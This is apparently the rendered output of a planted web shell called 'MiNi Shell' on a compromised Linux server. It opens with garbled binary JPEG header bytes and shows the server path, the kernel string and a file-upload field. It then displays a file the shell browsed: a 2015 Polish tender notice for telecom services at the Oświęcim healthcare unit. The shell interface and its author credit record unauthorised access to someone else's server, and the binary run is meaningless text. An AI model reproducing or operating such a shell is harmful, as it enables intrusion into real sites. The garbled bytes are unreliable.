JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150102/208-N-2015.html

<p class="kh_header"><b>Oświęcim: Usługa kompleksowego zabezpieczenia łączności dla ZOZ w Oświęcimiu</b><br>
<b>Numer ogłoszenia: 208 - 2015; data zamieszczenia: 02.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej w Oświęcimiu , ul. Wysokie Brzegi 4, 32-600 Oświęcim, woj. małopolskie, tel. 33 8448230, faks 33 8448384.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.propublico.pl; www.szpital.oswiecim.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa kompleksowego zabezpieczenia łączności dla ZOZ w Oświęcimiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usługi kompleksowego zabezpieczenia łączności dla ZOZ Oświęcim (telefony, dostęp do internetu). Przedmiot zamówienia obejmuje w szczególności:
1.1.	dzierżawę centrali telefonicznej cyfrowej z programem taryfikacji, 
1.2.	serwis i administracja centrali telefonicznej,
1.3.	doprowadzenie łączy:
a)	ISDN PRA (30B+D) od operatora do pomieszczenia centrali w lokalizacji przy ul. Wysokie Brzegi 4,
b)	2 × ISDN BRA (2B+D) 
2 do lokalizacji przy ul. Wysokie Brzegi 4,
c)	7 × linia telefoniczna analogowa:
6 do lokalizacji przy ul. Wysokie Brzegi 4,
1 do lokalizacji przy ul. Orzeszkowej 1 (poradnia odwykowa),
1.4.	zapewnienie usługi telefonicznej w zakresie połączeń telefonicznych lokalnych i strefowych, międzystrefowych, międzynarodowych i do sieci komórkowych w naliczaniu sekundowym generowanych na tym dostępie z centrali wewnętrznej Zamawiającego,
1.5.	tor pod budowę kanału cyfrowego:
a)	relacji ul. Wysokie Brzegi 4 - ul. Orzeszkowej 1,
1.6.	usługa dostępu do Internetu: łącze symetryczne 10 Mbit.

Usługi głosowe nie mogą być świadczone z użyciem technologii alternatywnych, takich jak: VoIP, numery dostępowe.
Dopuszcza się możliwość zestawienia zamówionych łącz drogą radiową pod warunkiem wykorzystania do transmisji licencjonowanego pasma radiowego.

2.	Wymagania:
2.1.	Konfiguracja i funkcje centrali telefonicznej:
a)	pojemność:
co najmniej 32 łącza wewnętrzne cyfrowe oraz 
co najmniej 260 łączy wewnętrznych analogowych,
b)	łącza miejskie: cyfrowe ISDN PRA (30B+D) oraz 7 analogowych,
c)	zdalne zarządzanie,
d)	zasilanie awaryjne,
e)	stanowisko do zarządzania oraz taryfikacji (serwer z oprogramowaniem),
f)	wsparcie producenta centrali w zakresie utrzymania i eksploatacji,
g)	podgląd alarmów systemu,
h)	statystyki ruchu,
i)	zapowiedzi głosowe,
j)	system podpowiedzi głosowych,
k)	możliwość zarządzania po sieci IP
l)	aparaty systemowe: 
12 podstawowych z wyświetlaczem, 
3 wieloliniowe aparaty z min. 12 programowalnymi klawiszami, 
3 aparaty wieloliniowe z 24 programowalnymi klawiszami,
m)	wybieranie po nazwisku,
n)	numery skrócone,
o)	przełącznica 660 par,
p)	możliwość konfigurowania zestawów sekretarsko dyrektorskich,
q)	możliwość dołączenia urządzeń faksowych do dowolnej wewnętrznej linii analogowej i bezbłędną transmisję faksową (faks grupy III) do wszystkich sieci stacjonarnych,
r)	tworzenie grup abonenckich,
s)	identyfikacja rozmówcy (funkcja CLIP realizowana na liniach systemowych),
t)	rejestracja połączeń nieodebranych,
u)	zawieszanie rozmów,
v)	przejmowanie rozmów,
w)	połączenia konsultacyjne,
x)	blokowanie aparatu hasłem,
y)	ograniczenie połączeń zewnętrznych (restrykcje),
z)	ponowne wybieranie numeru zewnętrznego,
aa)	tranzyt połączeń z łącza miejskiego na łącze miejskie,
bb)	przekazywanie natychmiastowe połączeń,
cc)	przekazywanie połączeń z opóźnieniem w razie braku odpowiedzi,
dd)	połączenie trójstronne,
ee)	rezerwacja połączenia,
ff)	tworzenie grup pick up (przechwytująca) - umożliwia przechwytywanie wywołań z jednego aparatu na inny w danej grupie,
gg)	awizo dla telefonistki,
hh)	elektroniczna książka telefoniczna,
ii)	bezpłatne połączenia pomiędzy numerami wewnętrznymi,
jj)	obsługa posiadanych przez Zamawiającego aparatów telefonicznych.

2.2.	Serwis i administracja centrali telefonicznej:
a)	 usunięcia awarii i usterek wraz z kosztami części zamiennych ponosi Wykonawca,
b)	wykonywanie na życzenie Zamawiającego czynności administracyjnych w centrali (np. zmiana uprawnień abonentów wewnętrznych, tworzenie grup pick up itp.).

2.3.	Doprowadzenie łączy ISDN i telefonicznych linii analogowych do poszczególnych lokalizacji:
a)	usługi telekomunikacyjne będą świadczone zgodnie z przepisami ustawy z dnia 16 lipca 2004 r. Prawo telekomunikacyjne (Dz. U. z 2004 r. nr 171 poz. 1800 ze zm.) oraz przepisami wykonawczymi,
b)	usługi ISDN winny zapewniać możliwość transmisji cyfrowej w każdym kanale B z prędkością 64 kbps,
c)	usługi winny umożliwiać bezbłędną transmisję faksową (faks grupy III) w dla wszystkich posiadanych przez Zamawiającego urządzeń do wszystkich sieci stacjonarnych,
d)	Wykonawca zobowiązuje się do zachowania numerów obecnie przydzielonych Zamawiającemu; aktualnie Zamawiający posiada numery telefoniczne:
dla łącza ISDN PRA 33 8448200 z zakresem DDI od 33 8448201 do 33 8448499 (Oświęcim ul. Wysokie Brzegi 4), 
dla łączy ISDN BRA:
33 8423522 (centrala - Oświęcim ul. Wysokie Brzegi 4),
33 8424587 (apteka szpitalna - Oświęcim ul. Wysokie Brzegi 4), 
dla telefonicznych linii analogowych:
33 8422011, 33 8424011 (centrala Oświęcim ul. Wysokie Brzegi 4),
33 8422211 (tomograf - Oświęcim ul. Wysokie Brzegi 4),
33 8422423 (NFZ - Oświęcim ul. Wysokie Brzegi 4),
33 8423742 (dyrekcja - fax Oświęcim ul. Wysokie Brzegi 4),
33 8443524 (księgowość - Oświęcim ul. Wysokie Brzegi 4),
33 8422977 (poradnia odwykowa - Oświęcim ul. Orzeszkowej 1).
Koszty związane z przeniesieniem numerów do własnej sieci poniesie Wykonawca z którym zostanie podpisana umowa.
e)	Wykonawca wyraża zgodę, by na liniach analogowych (w szczególności 33 8422211 i 33 8422423) połączenie z Internetem było realizowane przez innego Wykonawcę.
f)	Zamawiający zastrzega sobie prawo zmniejszenia ilości linii oraz zmianę lub ograniczenie usług bez konieczności ponoszenia kar umownych.
g)	Wykonawca odpowiada za sprawne przejęcie wszystkich numerów, przygotowanie dokumentacji niezbędnej do wykonania tego procesu oraz uzyskanie niezbędnych pozwoleń.

2.4.	Zapewnienie usługi telefonicznej w zakresie połączeń telefonicznych lokalnych i strefowych, międzystrefowych, międzynarodowych do krajów UE i do sieci komórkowych:
a)	rozliczenia za usługi połączeń będą się odbywać na następujących zasadach:
Wykonawca będzie stosował do rozliczeń za połączenia stawki naliczania sekundowego, 
Wykonawca nie będzie naliczał opłaty za inicjację połączenia,
wysokość stawek za usługi telefoniczne nie ulegnie zwiększeniu w czasie trwania umowy,
W przypadku pojawienia się korzystniejszej ogólnie dostępnej oferty Wykonawcy na przedmiotową usługę, Zamawiający ma prawo do skorzystania z niej.
b)	informacja o opłacie (AOC) dla wszystkich wychodzących połączeń,
c)	Wykonawca zapewni przełączenie usług wykorzystywanych dotychczas przez Zamawiającego bez przerw w łączności (ciągła możliwość realizacji połączeń do Zamawiającego na obecnie wykorzystywaną numerację),
d)	płatność wyłącznie na rzecz Wykonawcy - Zamawiający dopuszcza, aby Wykonawca wystawiał dwie odrębne faktury za świadczenie usług telekomunikacyjnych objętych przedmiotowym postępowaniem, z podziałem na: usługi telefonii stacjonarnej wraz z centralą telefoniczną oraz oddzielnie dla usługi dostępu do Internetu,
e)	termin płatności: 30 dni od daty otrzymania faktury VAT przez Zamawiającego,
f)	okres rozliczeniowy będzie równy miesiącom kalendarzowym i będzie się z nimi pokrywał.

2.5.	Tor pod budowę kanału cyfrowego:
a)	w relacji:
1 para: ul. Wysokie Brzegi 4 - ul. Orzeszkowej 1,
b)	przepływność co najmniej 1024 kbps; przepływność określana jest jako wynik automatycznej negocjacji przez modemy typu Planet GRT-501 będące własnością Zamawiającego.

2.6.	Usługi dostępu do Internetu w lokalizacji przy ul. Wysokie Brzegi 4:
a)	symetryczny dostęp do Internetu
prędkość transmisji od abonenta min. 10 Mbps, 
prędkość transmisji do abonenta min. 10 Mbps,
b)	zachowanie 8 stałych adresów IPv4 dostępnych dla urządzeń Zamawiającego z posiadanej przez niego puli adresów zarejestrowanej w RIPE,
c)	adresy IP z zakresów nie blokowanych przez powszechnie uznawane serwery antyspamowe, w szczególności SORBS.net, cbl.org,
d)	zakończenie po stronie Zamawiającego - Styk Ethernet (RJ45), zlokalizowane w serwerowi Zamawiającego znajdującej się w budynku głównym szpitala..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 50 % zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.21.10.00-8, 64.21.40.00-9, 72.41.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)Oświadczenia Wykonawcy - zał. nr 2 do SIWZ;
b) wykaz  wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a mianowicie przynajmniej:
Trzy usługi z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenie dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie- o charakterystyce nie niższej niż zamawiane (przepływność 10/10 Mbit/s)- zał. nr 5 do SIWZ
W przypadku wspólnie ubiegających się o zamówienie przynajmniej jeden z nich winien wykazać co najmniej 3 wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania   i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.
W przypadku skorzystania z uprawnień wynikających z art. 26 ust. 2b Pzp tj. posługiwania się  w celu wykazania spełnienia warunku cudzymi zasobami Zamawiający wymaga, by przynajmniej jeden z podmiotów użyczających wiedzy i doświadczenia przedstawił wykaz co najmniej 3 wykonanych, a w przypadku świadczeń okresowych lub ciągłych wykonanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenia Wykonawcy - zał. nr 2 do SIWZ;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta powinna zawierać:
Podpisany przez Wykonawcę Formularz Ofertowy według załącznika nr 1 do SIWZ
Podpisany przez Wykonawcę Formularz Cenowy według załącznika nr 2 do SIWZ
Dokumenty wymienione w Dziale III SIWZ
Dokumenty wymienione w Dziale VI SIWZ
Dokumenty wymienione w Dziale VII SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.propublico.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego, Dział Zamówień Publicznych, pokój nr 33.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2015 godzina 10:00, miejsce: W siedzibie Zamawiającego, Dział Zamówień Publicznych, pokój nr 33.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com